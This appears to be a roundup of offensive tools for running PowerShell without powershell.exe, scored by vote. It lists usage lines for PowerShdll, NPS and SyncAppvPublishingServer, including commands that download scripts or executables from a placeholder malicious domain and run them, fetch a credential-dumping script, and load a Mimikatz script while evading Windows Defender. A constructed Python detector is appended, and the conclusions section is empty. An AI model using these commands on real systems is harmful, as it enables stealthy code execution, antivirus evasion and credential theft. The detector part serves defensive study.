Run PowerShell without Powershell.exe — Best tools & techniques

Tools Analysis:

PowerLine

UserConf.xml with a custom Mimikatz ps1 script
Download the script locally and run it, but Defender blocks it
Detection from Windows Defender
The script was imported correctly and runs without triggering the AV

VOTE: 9

NPS — Not PowerShell

cmdline:
nps.exe "{powershell single command}"
nps.exe "& {commands; semi-colon; separated}"
nps.exe -encodedcommand {base64_encoded_command}
nps.exe -encode "commands to encode to base64"
nps.exe -decode {base64_encoded_command}

VOTE: 4

PowerShdll

Rundll32 Usage:
rundll32 PowerShdll,main <script>
rundll32 PowerShdll,main -h Display this message
rundll32 PowerShdll,main -f <path> Run the script passed as argument
rundll32 PowerShdll,main -w Start an interactive console in a new window
rundll32 PowerShdll,main -i Start an interactive console in this console
Exe Usage:
PowerShdll.exe <script>
PowerShdll.exe -h Display this message
PowerShdll.exe -f <path> Run the script passed as argument
PowerShdll.exe -i Start an interactive console in this console
Run base64 encoded script:
rundll32 Powershdll.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex
Download and run script
rundll32 PowerShdll.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

VOTE: 7

PowerLessShell

PowerLessShell on Kali for payload code creation
Code execution of the generated malicious payload

VOTE: 5

Nopowershell

VOTE: 6

SyncAppvPublishingServer

Usage:
C:\Windows\System32\SyncAppvPublishingServer.vbs "Break; Start-Process Calc.exe"
C:\Windows\System32\SyncAppvPublishingServer.vbs "Break; iwr http://172.16.217.130:443"
C:\Windows\System32\SyncAppvPublishingServer.vbs; Start-Process calc
C:\Windows\System32\SyncAppvPublishingServer.vbs "Break; Start-Process cmd.exe '/c notepad.exe'"
C:\Windows\System32\SyncAppvPublishingServer.exe \" Break; (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1','$env:USERPROFILE/1.ps1'); Start-Process '$env:USERPROFILE/1.ps1' -WindowStyle Minimized;"
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1') | IEX"
C:\Windows\System32\SyncAppvPublishingServer.exe \" Break; (New-Object System.Net.WebClient).DownloadFile('[MaliciousDomain]/Win.exe','$env:USERPROFILE/payload.exe'); Start-Process '$env:USERPROFILE/payload.exe' -WindowStyle Minimized;"
SyncAppvPublishingServer.vbs "n; (New-Object Net.WebClient).DownloadString('http://malciousdomain/payload.ps1') | IEX"

VOTE: 7
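Every technique above still needs the PowerShell engine or a host that proxies into it: PowerShdll (via rundll32), NPS and PowerLine load System.Management.Automation.dll into a process that is not powershell.exe, and SyncAppvPublishingServer.vbs/.exe pass their argument into a PowerShell command line, which is why a semicolon followed by more tokens appears in every usage line. The following detector is an added example, not code from the article or from any of the tools; the event shapes, field names, paths and the example.invalid URL are constructed to resemble Sysmon Event ID 1 and 7 records.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample events (not real telemetry), shaped like Sysmon
# Event ID 1 (process create) and Event ID 7 (image load) records.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "1", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "Break; Start-Process Calc.exe"'},
    {"id": "1", "image": r"C:\Windows\System32\SyncAppvPublishingServer.exe",
     "cmdline": "SyncAppvPublishingServer.exe \"n;(New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1') | IEX\""},
    {"id": "1", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n;"'},
    {"id": "7", "image": r"C:\Windows\System32\rundll32.exe",
     "imageloaded": r"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\System.Management.Automation.dll"},
    {"id": "7", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "imageloaded": r"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\System.Management.Automation.dll"},
    {"id": "7", "image": r"C:\Users\alice\Downloads\nps.exe",
     "imageloaded": r"C:\Windows\assembly\NativeImages\System.Management.Automation.ni.dll"},
]

# Processes that are expected to host the PowerShell engine.
EXPECTED_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
ENGINE_DLL = re.compile(r"\\System\.Management\.Automation(?:\.ni)?\.dll$", re.IGNORECASE)
# The script forwards its argument into a PowerShell command line, so a
# semicolon followed by further tokens is the injection shape shown above.
APPV_INJECT = re.compile(
    r"SyncAppvPublishingServer\.(?:vbs|exe)\s+\\?\"?\s*[^\";]*;\s*([^\"\s].*)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule, detail) pairs for events that match either rule."""
    findings = []
    for ev in events:
        if ev["id"] == "7" and ENGINE_DLL.search(ev.get("imageloaded", "")):
            host = basename(ev["image"])
            if host not in EXPECTED_HOSTS:
                findings.append(("ps-engine-in-unexpected-host", host))
        elif ev["id"] == "1":
            m = APPV_INJECT.search(ev.get("cmdline", ""))
            if m:
                findings.append(("syncappv-argument-injection", m.group(1).rstrip('"')))
    return findings
```

The image-load rule also catches PowerLessShell-style hosts such as msbuild.exe, since any process that embeds the engine has to map the same DLL; NoPowerShell, which reimplements cmdlets without the engine, needs process-level controls instead.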

CONCLUSIONS:

